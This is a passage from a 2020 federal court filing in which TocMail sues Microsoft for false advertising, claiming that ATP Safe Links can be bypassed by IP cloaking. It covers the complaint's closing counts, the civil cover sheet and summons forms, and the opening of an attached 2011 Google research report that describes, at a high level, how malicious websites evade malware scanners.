200.    Plaintiff is also seeking an award of Microsoft's profits from both the direct sale of Microsoft's ATP security service and from the sale of Office 365 derived from purchasers trusting Microsoft's deceptive ATP security claims.  Disgorgement of ill-gotten profits is separate from and independent of actual damages and is necessary here to deter future conduct and to prevent Microsoft from being unjustly enriched.  Among other things, companies were safe from IP Cloaking with their on-premise security, but Microsoft knowingly made companies defenseless against the most commonly used attack in order to procure billions in profit. The worldwide harm inflicted on companies, governmental institutions, and more necessitates future deterrence. There is great public interest in making the misconduct unprofitable.

201.    Microsoft's actions described herein have been and continue to be willful, deliberate and intentional.  Among other things, as discussed above, in 2017, Microsoft was officially notified that its ATP security can be bypassed in its entirety via IP cloaking, which is the most commonly used evasion technique.  Nevertheless, Microsoft continued and still continues to promote ATP Safe Links as effective protection against the very attack that Microsoft knows ATP Safe Links is inherently incapable of thwarting.

202.    Microsoft's misrepresentations are causing and will continue to cause damage to Plaintiff including, but not limited to, irreparable harm.  Irreparable harm includes the loss of customers and goodwill.

203.    Plaintiff is entitled to a temporary and permanent injunction against Microsoft, as well as all other remedies available including, but not limited to, compensatory damages, treble damages, disgorgement of profits, and costs and attorneys' fees. Plaintiff seeks all available remedies.

<div align="center">

**COUNT II:**
**Contributory False and Misleading Advertising**

</div>

204.    Plaintiff re-alleges and re-avers paragraphs 1-187 as though fully set forth herein.

205.    This is an action for contributory false and misleading advertising under the Lanham Act, 15 U.S.C. § 1125(a)(1)(B).

206.    As discussed above, Microsoft not only harms Plaintiff through its own false advertising but also harms Plaintiff through contributory false advertising as well.

207.    Multiple third parties offer alternatives to Safe Links to protect Microsoft's Office 365 users.  Microsoft provides these third parties access to its customers' accounts via a proprietary protocol.  These third parties cannot provide their services without Microsoft's providing of access, providing technology, and/or providing other forms of assistance. Microsoft provides other cybersecurity companies technology and/or other assistance.

208.    As a result of Microsoft's actions, the third parties use promotional and advertising messages that are false.  Alternatively, at a very minimum, they are misleading, confusing and/or deceiving.  Thus, the third parties are directly engaging in false advertising.  Such false advertising injures Plaintiff.

209.    Microsoft contributed to the third parties' false advertising by knowingly inducing or causing the third parties' conduct and/or by materially participating in it.  Among other things, Microsoft supplies and continues to supply its service to those third parties it knows or has reason

to know are engaged in false advertising directly in regards to the service being supplied. Microsoft is aware that its ATP Safe Links does not protect against the most simple form of attack.

210.    By providing access to these third parties in the presence of the false advertising, Microsoft materially benefits and contributes to it.

211.    As a result, Plaintiff has been damaged by Microsoft's contributory false advertising.

212.    Microsoft's actions described herein have been and continue to be willful, deliberate and intentional.

213.    Microsoft's misrepresentations are causing and will continue to cause damage to Plaintiff including, but not limited to, irreparable harm.

214.    Plaintiff is entitled to and seeks a temporary and permanent injunction against Microsoft, as well as all other remedies available including, but not limited to, compensatory damages, treble damages, disgorgement of profits, and costs and attorneys' fees.

## PRAYER FOR RELIEF

WHEREFORE, Plaintiff, TOCMAIL INC, prays for judgment against Defendant, MICROSOFT CORPORATION, as follows:

A.    Finding Defendant liable for the actions described herein;

B.    For temporary and permanent injunctive relief enjoining Defendant and its respective officers, employees, and agents, and all persons or entities in active concert or participation with Defendant, from misrepresenting the safety, nature, characteristics and qualities of its Advanced Threat Protection service and requiring Defendant to take corrective action regarding Defendant's past actions, including Ordering that:

(i) Defendant immediately cease promoting Advanced Threat Protection and/or Safe Links or any of its security services as offering effective protection against the malicious use of dynamic links;

(ii) Defendant immediately cease claiming that its Advanced Threat Protection and/or Safe Links or any of its security services ensure that hyperlinks are harmless;

(iii) Defendant immediately cease promoting Advanced Threat Protection and/or Safe Links or any of its security services as offering effective protection against forwarding services that route to unsafe sites after email messages have been delivered;

(iv) Defendant immediately cease using categorical language to promote the idea that all malicious sites are dynamically blocked;

(v) Defendant immediately cease promoting its security service as fully sufficient and/or the only cybersecurity that a company needs;

(vi) Defendant immediately cease using the deceptive name "Safe Links" for its redirect service;

(vii) Defendant immediately cease its contributory false advertising and requiring all third parties to accurately represent the security they provide to Defendant's customers;

C.     For damages, including ordering Defendant to pay Plaintiff monetary relief under 15 U.S.C. § 1117(a) in an amount equal to Defendant's profits, plus damages sustained by Plaintiff in excess of $43 billion, as a result of Defendant's wrongful actions;

D.      Ordering Defendant to pay Plaintiff three times Defendant's profits made as a result of Defendant's wrongful actions or three times Plaintiff's damages, whichever is greater;

E.      Finding that this case is exceptional pursuant to 15 U.S.C. §§ 1117(a) due to Defendant's willful and intentional acts described herein and, accordingly, award Plaintiff its reasonable attorneys' fees;

F.      Finding that Plaintiff is entitled to recover its costs of Court;

G.      Finding that Plaintiff is entitled to prejudgment and post-judgment interest; and

H.      For such other and further relief the Court deems just and proper.

## DEMAND FOR JURY TRIAL

Plaintiff demands a jury trial for all issues so triable.

Dated: February 26, 2020                    Respectfully submitted,

By:   /s/Joshua D. Martin
Joshua D. Martin
Florida Bar No. 028100
josh.martin@johnsonmartinlaw.com
JOHNSON & MARTIN, P.A.
500 W. Cypress Creek Rd., Suite 430
Fort Lauderdale, Florida 33309
Telephone: (954) 790-6699
Facsimile: (954) 206-0017

*Attorney for Plaintiff, TocMail Inc*

# CIVIL COVER SHEET

The JS 44 civil cover sheet and the information contained herein neither replace nor supplement the filing and service of pleadings or other papers as required by law, except as provided by local rules of court. This form, approved by the Judicial Conference of the United States in September 1974, is required for the use of the Clerk of Court for the purpose of initiating the civil docket sheet. *(SEE INSTRUCTIONS ON NEXT PAGE OF THIS FORM.)*

| I. (a) PLAINTIFFS | DEFENDANTS |
|---|---|
| TOCMAIL INC | MICROSOFT CORPORATION |

| (b) County of Residence of First Listed Plaintiff | County of Residence of First Listed Defendant |
|---|---|
| *(EXCEPT IN U.S. PLAINTIFF CASES)* | *(IN U.S. PLAINTIFF CASES ONLY)* |
| | NOTE: IN LAND CONDEMNATION CASES, USE THE LOCATION OF THE TRACT OF LAND INVOLVED. |

| (c) Attorneys *(Firm Name, Address, and Telephone Number)* | Attorneys *(If Known)* |
|---|---|
| Joshua D. Martin, josh.martin@johnsonmartinlaw.com JOHNSON & MARTIN, PA, 500 West Cypress Road, Suite 430 Fort Lauderdale, Florida 33309, Telephone: (954) 790-6699 | |

## II. BASIS OF JURISDICTION *(Place an "X" in One Box Only)*

☐ 1 U.S. Government Plaintiff

☒ 3 Federal Question (U.S. Government Not a Party)

☐ 2 U.S. Government Defendant

☐ 4 Diversity (Indicate Citizenship of Parties in Item III)

## III. CITIZENSHIP OF PRINCIPAL PARTIES *(Place an "X" in One Box for Plaintiff and One Box for Defendant)*
*(For Diversity Cases Only)*

| | PTF | DEF | | PTF | DEF |
|---|---|---|---|---|---|
| Citizen of This State | ☐ 1 | ☐ 1 | Incorporated *or* Principal Place of Business In This State | ☐ 4 | ☐ 4 |
| Citizen of Another State | ☐ 2 | ☐ 2 | Incorporated *and* Principal Place of Business In Another State | ☐ 5 | ☐ 5 |
| Citizen or Subject of a Foreign Country | ☐ 3 | ☐ 3 | Foreign Nation | ☐ 6 | ☐ 6 |

## IV. NATURE OF SUIT *(Place an "X" in One Box Only)*

Click here for: Nature of Suit Code Descriptions.

| CONTRACT | TORTS | | FORFEITURE/PENALTY | BANKRUPTCY | OTHER STATUTES |
|---|---|---|---|---|---|
| ☐ 110 Insurance | **PERSONAL INJURY** | **PERSONAL INJURY** | ☐ 625 Drug Related Seizure of Property 21 USC 881 | ☐ 422 Appeal 28 USC 158 | ☐ 375 False Claims Act |
| ☐ 120 Marine | ☐ 310 Airplane | ☐ 365 Personal Injury - Product Liability | ☐ 690 Other | ☐ 423 Withdrawal 28 USC 157 | ☐ 376 Qui Tam (31 USC 3729(a)) |
| ☐ 130 Miller Act | ☐ 315 Airplane Product Liability | ☐ 367 Health Care/ | | | ☐ 400 State Reapportionment |
| ☐ 140 Negotiable Instrument | ☐ 320 Assault, Libel & Slander | Pharmaceutical Personal Injury | | **PROPERTY RIGHTS** | ☐ 410 Antitrust |
| ☐ 150 Recovery of Overpayment & Enforcement of Judgment | ☐ 330 Federal Employers' Liability | Product Liability | | ☐ 820 Copyrights ☐ 830 Patent | ☐ 430 Banks and Banking ☐ 450 Commerce |
| ☐ 151 Medicare Act | ☐ 340 Marine | ☐ 368 Asbestos Personal Injury Product Liability | | ☐ 835 Patent - Abbreviated New Drug Application | ☐ 460 Deportation |
| ☐ 152 Recovery of Defaulted Student Loans (Excludes Veterans) | ☐ 345 Marine Product Liability | **PERSONAL PROPERTY** | | ☐ 840 Trademark | ☐ 470 Racketeer Influenced and Corrupt Organizations |
| ☐ 153 Recovery of Overpayment of Veteran's Benefits | ☐ 350 Motor Vehicle | ☐ 370 Other Fraud | **LABOR** | **SOCIAL SECURITY** | ☐ 480 Consumer Credit (15 USC 1681 or 1692) |
| ☐ 160 Stockholders' Suits | ☐ 355 Motor Vehicle Product Liability | ☐ 371 Truth in Lending | ☐ 710 Fair Labor Standards Act | ☐ 861 HIA (1395ff) ☐ 862 Black Lung (923) | ☐ 485 Telephone Consumer Protection Act |
| ☐ 190 Other Contract | ☐ 360 Other Personal Injury | ☐ 380 Other Personal Property Damage | ☐ 720 Labor/Management Relations | ☐ 863 DIWC/DIWW (405(g)) ☐ 864 SSID Title XVI | ☐ 490 Cable/Sat TV |
| ☐ 195 Contract Product Liability | ☐ 362 Personal Injury - Medical Malpractice | ☐ 385 Property Damage Product Liability | ☐ 740 Railway Labor Act | ☐ 865 RSI (405(g)) | ☐ 850 Securities/Commodities/ Exchange |
| ☐ 196 Franchise | | | ☐ 751 Family and Medical Leave Act | | ☒ 890 Other Statutory Actions |
| **REAL PROPERTY** | **CIVIL RIGHTS** | **PRISONER PETITIONS** | ☐ 790 Other Labor Litigation | **FEDERAL TAX SUITS** | ☐ 891 Agricultural Acts |
| ☐ 210 Land Condemnation | ☐ 440 Other Civil Rights | **Habeas Corpus:** | ☐ 791 Employee Retirement Income Security Act | ☐ 870 Taxes (U.S. Plaintiff or Defendant) | ☐ 893 Environmental Matters |
| ☐ 220 Foreclosure | ☐ 441 Voting | ☐ 463 Alien Detainee | | ☐ 871 IRS—Third Party 26 USC 7609 | ☐ 895 Freedom of Information Act |
| ☐ 230 Rent Lease & Ejectment | ☐ 442 Employment | ☐ 510 Motions to Vacate Sentence | | | ☐ 896 Arbitration |
| ☐ 240 Torts to Land | ☐ 443 Housing/ Accommodations | ☐ 530 General | | | ☐ 899 Administrative Procedure Act/Review or Appeal of Agency Decision |
| ☐ 245 Tort Product Liability | ☐ 445 Amer. w/Disabilities - Employment | ☐ 535 Death Penalty | **IMMIGRATION** | | ☐ 950 Constitutionality of State Statutes |
| ☐ 290 All Other Real Property | ☐ 446 Amer. w/Disabilities - Other | **Other:** ☐ 540 Mandamus & Other | ☐ 462 Naturalization Application ☐ 465 Other Immigration Actions | | |
| | ☐ 448 Education | ☐ 550 Civil Rights ☐ 555 Prison Condition ☐ 560 Civil Detainee - Conditions of Confinement | | | |

## V. ORIGIN *(Place an "X" in One Box Only)*

☒ 1 Original Proceeding

☐ 2 Removed from State Court

☐ 3 Remanded from Appellate Court

☐ 4 Reinstated or Reopened

☐ 5 Transferred from Another District *(specify)*

☐ 6 Multidistrict Litigation - Transfer

☐ 8 Multidistrict Litigation - Direct File

## VI. CAUSE OF ACTION

Cite the U.S. Civil Statute under which you are filing *(Do not cite jurisdictional statutes unless diversity)*:
15 U.S.C. § 1125

Brief description of cause:
False and misleading advertising under the Lanham Act

## VII. REQUESTED IN COMPLAINT:

☐ CHECK IF THIS IS A CLASS ACTION UNDER RULE 23, F.R.Cv.P.

DEMAND $ 43,000,000,000.00

CHECK YES only if demanded in complaint:
JURY DEMAND: ☒ Yes ☐ No

in addition to an injunction and disgorgement of profits.

## VIII. RELATED CASE(S) IF ANY

*(See instructions):*

JUDGE _____ DOCKET NUMBER _____

| DATE | SIGNATURE OF ATTORNEY OF RECORD |
|---|---|
| 02/26/2020 | /s/ Joshua D. Martin |

**FOR OFFICE USE ONLY**

RECEIPT # _____ AMOUNT _____ APPLYING IFP _____ JUDGE _____ MAG JUDGE _____

# INSTRUCTIONS FOR ATTORNEYS COMPLETING CIVIL COVER SHEET FORM JS 44

### Authority For Civil Cover Sheet

The JS 44 civil cover sheet and the information contained herein neither replaces nor supplements the filings and service of pleading or other papers as required by law, except as provided by local rules of court. This form, approved by the Judicial Conference of the United States in September 1974, is required for the use of the Clerk of Court for the purpose of initiating the civil docket sheet. Consequently, a civil cover sheet is submitted to the Clerk of Court for each civil complaint filed. The attorney filing a case should complete the form as follows:

**I.(a)** **Plaintiffs-Defendants.** Enter names (last, first, middle initial) of plaintiff and defendant. If the plaintiff or defendant is a government agency, use only the full name or standard abbreviations. If the plaintiff or defendant is an official within a government agency, identify first the agency and then the official, giving both name and title.

**(b)** **County of Residence.** For each civil case filed, except U.S. plaintiff cases, enter the name of the county where the first listed plaintiff resides at the time of filing. In U.S. plaintiff cases, enter the name of the county in which the first listed defendant resides at the time of filing. (NOTE: In land condemnation cases, the county of residence of the "defendant" is the location of the tract of land involved.)

**(c)** **Attorneys.** Enter the firm name, address, telephone number, and attorney of record. If there are several attorneys, list them on an attachment, noting in this section "(see attachment)".

**II.** **Jurisdiction.** The basis of jurisdiction is set forth under Rule 8(a), F.R.Cv.P., which requires that jurisdictions be shown in pleadings. Place an "X" in one of the boxes. If there is more than one basis of jurisdiction, precedence is given in the order shown below.
United States plaintiff. (1) Jurisdiction based on 28 U.S.C. 1345 and 1348. Suits by agencies and officers of the United States are included here.
United States defendant. (2) When the plaintiff is suing the United States, its officers or agencies, place an "X" in this box.
Federal question. (3) This refers to suits under 28 U.S.C. 1331, where jurisdiction arises under the Constitution of the United States, an amendment to the Constitution, an act of Congress or a treaty of the United States. In cases where the U.S. is a party, the U.S. plaintiff or defendant code takes precedence, and box 1 or 2 should be marked.
Diversity of citizenship. (4) This refers to suits under 28 U.S.C. 1332, where parties are citizens of different states. When Box 4 is checked, the citizenship of the different parties must be checked**.** (See Section III below**; NOTE: federal question actions take precedence over diversity cases.**)

**III.** **Residence (citizenship) of Principal Parties.** This section of the JS 44 is to be completed if diversity of citizenship was indicated above. Mark this section for each principal party.

**IV.** **Nature of Suit.** Place an "X" in the appropriate box. If there are multiple nature of suit codes associated with the case, pick the nature of suit code that is most applicable. Click here for: Nature of Suit Code Descriptions.

**V.** **Origin.** Place an "X" in one of the seven boxes.
Original Proceedings. (1) Cases which originate in the United States district courts.
Removed from State Court. (2) Proceedings initiated in state courts may be removed to the district courts under Title 28 U.S.C., Section 1441.
Remanded from Appellate Court. (3) Check this box for cases remanded to the district court for further action. Use the date of remand as the filing date.
Reinstated or Reopened. (4) Check this box for cases reinstated or reopened in the district court. Use the reopening date as the filing date.
Transferred from Another District. (5) For cases transferred under Title 28 U.S.C. Section 1404(a). Do not use this for within district transfers or multidistrict litigation transfers.
Multidistrict Litigation – Transfer. (6) Check this box when a multidistrict case is transferred into the district under authority of Title 28 U.S.C. Section 1407.
Multidistrict Litigation – Direct File. (8) Check this box when a multidistrict case is filed in the same district as the Master MDL docket.
**PLEASE NOTE THAT THERE IS NOT AN ORIGIN CODE 7.** Origin Code 7 was used for historical records and is no longer relevant due to changes in statue.

**VI.** **Cause of Action.** Report the civil statute directly related to the cause of action and give a brief description of the cause. **Do not cite jurisdictional statutes unless diversity.** Example: U.S. Civil Statute: 47 USC 553 Brief Description: Unauthorized reception of cable service

**VII.** **Requested in Complaint.** Class Action. Place an "X" in this box if you are filing a class action under Rule 23, F.R.Cv.P.
Demand. In this space enter the actual dollar amount being demanded or indicate other demand, such as a preliminary injunction.
Jury Demand. Check the appropriate box to indicate whether or not a jury is being demanded.

**VIII.** **Related Cases.** This section of the JS 44 is used to reference related pending cases, if any. If there are related pending cases, insert the docket numbers and the corresponding judge names for such cases.

**Date and Attorney Signature.** Date and sign the civil cover sheet.

AO 440 (Rev. 06/12)  Summons in a Civil Action

# UNITED STATES DISTRICT COURT

for the

Southern District of Florida

| | | |
|---|---|---|
| TOCMAIL INC | ) | |
| | ) | |
| | ) | |
| | ) | |
| *Plaintiff(s)* | ) | |
| v. | ) | Civil Action No.  0:20-cv-60416 |
| MICROSOFT CORPORATION | ) | |
| | ) | |
| | ) | |
| | ) | |
| *Defendant(s)* | ) | |

## SUMMONS IN A CIVIL ACTION

To: *(Defendant's name and address)*  MICROSOFT CORPORATION
c/o Corporation Service Company, as Registered Agent
1201 Hays Street
Tallahassee, FL 32301

A lawsuit has been filed against you.

Within 21 days after service of this summons on you (not counting the day you received it) — or 60 days if you are the United States or a United States agency, or an officer or employee of the United States described in Fed. R. Civ. P. 12 (a)(2) or (3) — you must serve on the plaintiff an answer to the attached complaint or a motion under Rule 12 of the Federal Rules of Civil Procedure.  The answer or motion must be served on the plaintiff or plaintiff's attorney, whose name and address are:   Joshua D. Martin
Email: josh.martin@johnsonmartinlaw.com
JOHNSON & MARTIN, PA
500 West Cypress Road, Suite 430
Fort Lauderdale, Florida 33309
Telephone: (954) 790-6699

If you fail to respond, judgment by default will be entered against you for the relief demanded in the complaint. You also must file your answer or motion with the court.

*CLERK OF COURT*

Date: _____                    _____
*Signature of Clerk or Deputy Clerk*

AO 440 (Rev. 06/12)  Summons in a Civil Action (Page 2)

Civil Action No.  0:20-cv-60416

## PROOF OF SERVICE
### *(This section should not be filed with the court unless required by Fed. R. Civ. P. 4 (l))*

This summons for *(name of individual and title, if any)* _____

was received by me on *(date)* _____ .

❒ I personally served the summons on the individual at *(place)* _____

_____ on *(date)* _____ ; or

❒ I left the summons at the individual's residence or usual place of abode with *(name)* _____

_____ , a person of suitable age and discretion who resides there,

on *(date)* _____ , and mailed a copy to the individual's last known address; or

❒ I served the summons on *(name of individual)* _____ , who is

designated by law to accept service of process on behalf of *(name of organization)* _____

_____ on *(date)* _____ ; or

❒ I returned the summons unexecuted because _____ ; or

❒ Other *(specify):*



My fees are $ _____ for travel and $ _____ for services, for a total of $ __0.00__ .

I declare under penalty of perjury that this information is true.


Date: _____

_____
*Server's signature*

_____
*Printed name and title*


_____
*Server's address*

Additional information regarding attempted service, etc:

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSD Docket 02/26/2020 Page 56 of 726

# EXHIBIT 1

Case 0:20-cv-60416-AMC Document 3-1 Entered on FLSB Docket 02/26/2020 Page 57 of 726
Case 0:20-cv-60416-XXXX Document 1-3 Entered on FLSB Docket 02/26/2020 Page 2 of 126
Google Technical Report rajab-2011a, July 2011

# Trends in Circumventing Web-Malware Detection

Moheeb Abu Rajab, Lucas Ballard, Nav Jagpal, Panayiotis Mavrommatis,
Daisuke Nojiri, Niels Provos, Ludwig Schmidt[*]

## ABSTRACT

Malicious web sites that compromise vulnerable computers are an ever-present threat on the web. The purveyors of these sites are highly motivated and quickly adapt to technologies that try to protect users from their sites. This paper studies the resulting arms race between detection and evasion from the point of view of Google's Safe Browsing infrastructure, an operational web-malware detection system that serves hundreds of millions of users. We analyze data collected over a four year period and study the most popular practices that challenge four of the most prevalent web-malware detection systems: *Virtual Machine client honeypots*, *Browser Emulator client honeypots*, *Classification based on domain reputation*, and *Anti-Virus engines*. Our results show that none of these systems are effective in isolation. In addition to describing specific methods that malicious web sites employ to evade detection, we study trends over time to measure the prevalence of evasion at scale. Our results indicate that exploit delivery mechanisms are becoming increasingly complex and evasive.

## 1. INTRODUCTION

Malicious web sites capable of compromising vulnerable computers have been on the rise for many years. As web pages have become more interactive and feature-rich, the complexity of the browser and the software components involved in rendering web content has increased significantly. Over the last few years, almost any browser including support for technologies such as Flash, Java, PDF or QuickTime has been susceptible to so called *drive-by download* attacks that allow adversaries to run arbitrary software on a vulnerable computer system.

The difficulty of discovering malware on the web is amplified by the fundamental conflict between those who identify and block malicious content and those who attempt to evade detection to distribute malware. The resulting arms race has led to many novel approaches for identifying web-based malware. Despite this interest, there has been no dedicated study analyzing whether evasion techniques are effective, and more importantly, whether they are being actively pursued to stealthily distribute malware. This paper seeks to answer these questions.

We study four years of data collected by Google's web-malware detection systems, which leverages four of the most popular web-malware detection technologies: *Virtual Machine client honeypots*, *Browser Emulator client honeypots*, *Classification based on domain reputation*, and *Anti-Virus engines*. Our analysis reveals that adversaries actively try to evade each of these systems. Despite this, our results indicate that combining multiple types of client honeypots can improve detection rates.

This paper makes the following contributions: (1) an analysis of the prevalence and impact of different evasion techniques against the four most popular web malware detection systems. (2) an evaluation that shows how these detection systems complement each other to improve detection rates. (3) an investigation of the complexity of JavaScript on the web and how it relates to evasion. (4) a study of which vulnerabilities have been targeted by web-based malware and measure how this makeup has changed over time. Our analysis raises awareness about the evasive tactics that must be considered when developing operational web malware detection systems.

## 2. BACKGROUND

The attack surface of the modern web browser is quite large. Web-based malware can target vulnerabilities in the browser itself, or against the myriad of plugins that extend the browser to handle, for example, Flash, Java applets, or PDF files. A vulnerability in any of these components may be leveraged to compromise the browser and the underlying operating system. As a prerequisite to exploiting a user, an adversary needs to expose the user's browser to malicious payloads. This can be achieved by sending an email or IM to the user containing a URL to a malicious server, or by compromising web servers and injecting references to malicious code into the content served to users [17].

Many different approaches for detecting malicious web content have been proposed. In the following we review the most prevalent: Virtual Machine Honeypots, Browser Emulation Honeypots, Classification based on Domain Reputation, and Virus Signatures.

**Virtual Machine Honeypots.** Several VM-based detection systems have been proposed in the literature [10, 16, 15, 19, 9]. They typically detect exploitation of the web browser by monitoring changes to the operating system, such as the creation of new processes, or changes to the file system or registry. Here, the virtual machine functions as a black box since no prior knowledge of vulnerabilities or exploit techniques is required.

HoneyMonkey [19] launches Internet Explorer against a URL and after waiting for several minutes determines if suspicious file system changes were made. To detect zero-day exploits, the same URL is evaluated in Windows systems with different patch levels. Moshchuk et al. [10] went further in that their system also looked for newly created processes as well as file system writes not initiated by the browser. In previous work [16], we demonstrated that VM-based web-malware detection could be scaled to scan a large portion of the web and presented statistics on over 3 million drive-by download URLs.

While virtual machines run a complete software system and may detect exploits of yet unknown vulnerabilities, precisely determining what resource triggered the exploit or which vulnerability was

---

[*]Research conducted as an intern at Google.

targeted may be difficult. Additionally, managing multiple VM images with different combinations of exploitable software components can be an arduous task. Browser emulation has been proposed to address these shortcomings.

**Browser Emulation.** Instead of deploying VM honeypots, one can emulate a browser and use dynamic analysis to identify exploits. JSAND by Cova et al. [3] follows this approach and emulates a browser to extract features from web pages that indicate malicious behavior. PhoneyC [13] is another Browser Emulator. It includes support for JavaScript and VBScript as well as the ability to instantiate fake ActiveX objects. Modules with signatures for known vulnerabilities allow PhoneyC to detect exploits against plugins.

Browser emulators can pinpoint the exploited vulnerability and even establish a chain of causality including every single web request involved in a drive-by download. On the other hand, emulators cannot detect exploit attempts against unknown vulnerabilities and must be updated to handle quirks in mainstream browsers as they are discovered.

**Reputation Based Detection.** In the absence of malicious payloads, it is possible to take a content-agnostic approach to classify web pages based on the reputation of the hosting infrastructure. Felegyhazi et al. leverage DNS properties to predict new malicious domains based on an initial seed [4]. Lee et al. developed Notos, a dynamic reputation system for DNS, that can flag domains as malicious weeks before they appear on public blacklists [1]. Although Notos is not meant for detecting malicious web pages, a similar approach can be followed by flagging pages that include resources that are hosted on malicious domains.

**Signature Based Detection.** Traditional Anti-Virus (AV) systems operate by scanning payloads for known indicators of maliciousness. These indicators are identified by AV signatures, which must be continuously updated to identify new threats. Typically, packed executables or HTML must be unpacked before performing matching. For web pages, this might involve HTML parsing or rudimentary JavaScript execution. If unpacking is not possible, AV engines may flag a binary as malicious solely by detecting the presence of the packer. For JavaScript, AVs focus on detecting the presence of heavy obfuscation. Oberheide et al. showed that combining multiple AV engines can significantly improve the detection rate [14].

## 3. EVADING DETECTION

In Section 2, we discussed different approaches for detecting malicious web pages. Just as these approaches are being improved, adversaries are becoming more skilled at hiding malicious content. To better understand how adversaries attempt to stay under the radar, we present an overview of common tactics that we encounter.

Social engineering has emerged as a growing malware distribution vector [18]. In social engineering attacks, the user is asked to install a malware binary under false pretenses. Social engineering attacks challenge automated detection systems by requiring arbitrarily complex interaction before delivering the payload; interaction that can be difficult to simulate algorithmically.

Attacks that target specific software configurations can also challenge VM honeypots that employ a VM image with a different OS, browser, or set of plugins. Even if one deploys multiple VM images with different software components, selecting the image to scan a target page is challenging [3], and resource limitations might reduce the number of times a page can be scanned with different configurations.

To evade browser emulators, AV engines, or manual analysis, adversaries can test for idiosyncratic properties of the browser and only reveal exploit code if the test passes. Often, this is built into packers that fail to deobfuscate malicious payloads if certain conditions are not met. While the set of potential differences between emulators and real browsers is large, we have found that tests typically fall into three high-level categories: *JavaScript Environment Compatibility*, *Parser Compatibility*, and *DOM Completeness*.

In the case of an IE-specific exploit, code can probe the JavaScript Environment for differences between IE's proprietary JavaScript engine and open source JavaScript engines [12, 11, 5], which are more likely employed by emulators. This typically goes beyond simply testing for properties in the `navigator` object, and focuses instead on more arcane differences, e.g., changes to the DOM caused by CSS, which are typically not implemented by emulators that do not need to handle rendering. One can also identify semantic differences in both JavaScript and HTML parsers, for instance, IE's JavaScript parser allows `;` between `try` and `catch` clauses, while other JavaScript parsers do not. Perhaps one of the most challenging properties to emulate is the DOM of the browser, especially when accounting for the bugs exhibited by different browsers' DOM implementations. For instance, IE6 and IE7 will add extra nodes to the DOM when encountering incorrectly formed HTML. Concrete examples of each of these phenomena can be found in Appendix A.

While adversaries often turn to elaborate technical constructs to evade detection, a simple yet powerful approach is to cloak against scanners by serving malicious content to users but benign content to the detector. While there are many forms of cloaking, in this paper we focus on arguably the most simple and effective approach: cloaking at the IP level. To do so, malicious servers simply refuse to return malicious content to requests from certain IP addresses.

## 4. EXPERIMENTAL SETUP

The goal of this paper is to measure forms of circumvention described in Section 3 and determine whether the use of evasive tactics has increased over the last several years. To do so, we analyze the data collected by Google's Safe Browsing infrastructure [16], a large-scale web malware detection system. The data generated by this system is used by more than 400 million users per week and is therefore the target of many forms of evasion. Moreover, the system classifies sites using VM-based client honeypots, a Browser-Emulator, Signature-based AV engines, and Domain Reputation, and is thus ideal for evaluating how evasion affects each of these popular technologies.

### 4.1 System Overview

The malware detection pipeline takes as input a large corpus of URLs from a variety of sources. For example, we select URLs from Google's web index using both random sampling and a machine learning classifier that is tuned to identify pages that likely contain malware [16]. We also sample URLs that match trending search queries, as well as user-reported URLs. The selection criteria for the data has not changed significantly over the course of our study.

Each URL is fed to a VM-based honeypot, which browses to the URL with an unpatched version of Internet Explorer that has popular plugins and runs on an unpatched Windows OS. The system records host and network activity, including new processes, file system changes, registry changes, and network fetches. All network fetches and system state changes are stored in a Bigtable [2] for post processing.

Once a VM has processed a URL, a scoring module, `PageScorer`, analyzes the saved content to identify malicious behavior. First, all network fetches are scanned by multiple AV engines and matched against an internal list of domains that are known to serve malicious



**Figure 1: The diagram shows a high-level overview of Google's web-malware detection system. VMs collect data from web pages and store it in a database for analysis.** PageScorer leverages multiple scorers to determine if a web page is malicious.

content; see Section 4.1.2. Next, PageScorer instructs a Browser Emulator to reprocess the content that was retrieved by the VM to identify exploits. The Browser Emulator uses the stored content as a cache and thus does not make any network fetches; see Section 4.1.1. Finally, PageScorer uses a decision tree classifier to combine the output of the VM, AV Engines, Reputation Scorer, and Browser Emulator to determine whether the page attempted to exploit the browser; see Figure 1. The output of PageScorer, including whether the page caused new processed to be spawned, whether it was flagged by AV engines, which exploits it contained, and whether it matched Domain Reputation data, is stored along with the original data from the VM for future analysis.

A description of our VM-based honeypots and AV engine integration has been previously published [16, 17]. Since then we have added Browser Emulation and a Domain Reputation pipeline which we briefly summarize below to familiarize the reader with the data collection process.

### 4.1.1 Browser Emulation

Our Browser Emulator is a custom implementation similar to other mainstream emulators including PhoneyC [13] and JSAND [3]. We thus believe that its performance is representative of Browser Emulators in general.

Briefly, the Browser Emulator is built on top of a custom HTML parser and a modified open-source JavaScript engine. It constructs a DOM and event model that is similar to Internet Explorer. To ensure a faithful representation of IE, we have modified all parsers to handle IE-specific constructs; for examples, see Appendix A. The Emulator detects exploits against both the browser and the plug-ins by monitoring calls to known-vulnerable components, as well as monitoring DOM accesses.

The emulator can also perform fine-grained tracing of JavaScript execution. When running in tracing mode, it records every function call and the arguments to those calls, e.g. we record which DOM functions were called and which arguments were passed to them. This allows for more detailed analysis of exploitation techniques, which we explore later in the paper.

### 4.1.2 Domain Reputation

The domain reputation pipeline runs periodically and analyzes the output of AV engines and the Browser Emulator to determine which sites are responsible for launching exploits and serving malware. We call these sites *Distribution Domains*. The pipeline employs a decision-tree classifier to decide whether a site is a distribution domain. Features include, for example, whether we have seen

the site deliver an exploit during a drive-by download.

In addition to assessing whether a domain is serving malware, the classifier also examines network requests to that domain from IP addresses not associated with our organization. This allows us to determine whether domains are cloaking against our system at the network level. We call such domains *Cloaking Domains*, they are domains that distribute malware and also actively try to evade detection. Distribution and Cloaking Domains make up our Domain Reputation data, which is fed back into PageScorer to improve detection rates for drive-by downloads.

## 4.2 Data Collection

In order to study evasion trends we leverage two distinct data sets. The first set, Data Set I, is the data that is generated by our operational pipeline, i.e., the output of PageScorer. It was generated by processing $\sim$1.6 billion distinct web pages collected between December 1, 2006 and April 1, 2011. This data is useful for studying trends that we observe in real time. The limitation with this data is that we continuously tweak our algorithms to improve detection, thus any trends observed from Data Set I could be due to either changes in the web pages that we are processing, or to improvements to our algorithms. To eliminate this uncertainty, we introduce our second data set, Data Set II.

Data Set II is created as follows. First, we select a group of pages from Data Set I. We sample pages from the time period between December 1, 2006 and October 12, 2010 that were marked as suspicious by the VM-based honeypot, the Browser Emulator, the AV scanners, or our Reputation data. Note that this does not mean PageScorer classified these pages as malicious. For example, if an AV engine flagged a page but the other scoring components did not, then the page would not be classified as bad by PageScorer, but it would be added to the sample. In this way the sample includes every bad page that our pipeline processed over the four year period, as well as some other "suspicious" pages. In addition to these pages, our sample also includes 1% of other "non-suspicious" pages selected uniformly at random from the same time period.

